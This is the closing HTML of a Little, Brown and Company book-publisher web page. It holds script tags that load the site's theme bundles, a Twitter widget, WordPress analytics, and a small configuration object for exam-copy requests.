<script type='text/javascript' src='https://www.littlebrown.com/wp-content/themes/hachette/static/js/hachette-site.bundle.min.js?ver=ad13182eaaf9298a8ae4' id='hachette-site-js-js'></script>
<script type='text/javascript' id='hbg-all-domains-js-js-extra'>
/* <![CDATA[ */
var checkExam = {"ajaxUrl":"https:\/\/www.littlebrown.com\/wp-admin\/admin-ajax.php","nonce":"6f1cd6a651","isbns":["California Nature Lovers Sweepstakes"],"button":".zb-btn","link":"exam-copy-link","zola_url":"https:\/\/examcopyrequestform.poweredbyzola.com\/?isbn="};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.littlebrown.com/wp-content/themes/hachette-book-group/client/build/js/lens-hbg-all-domains.bundle.js?ver=beaa4715269b9f8f4374' id='hbg-all-domains-js-js'></script>
<script type='text/javascript' src='https://platform.twitter.com/widgets.js?ver=1.0' id='hbg-twitter-widget-js'></script>
<script type='text/javascript' src='https://www.littlebrown.com/wp-content/themes/hachette-book-group/client/build/js/lens-little-brown-and-company.bundle.js?ver=beaa4715269b9f8f4374' id='hachette-lens-js-js'></script>
<script src='https://stats.wp.com/e-202215.js' defer></script>
<script>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:10.8',blog:'155679224',post:'1210696',tz:'-4',srv:'www.littlebrown.com',hp:'vip'} ]);
	_stq.push([ 'clickTrackerInit', '155679224', '1210696' ]);
</script>
	</body>
</html>

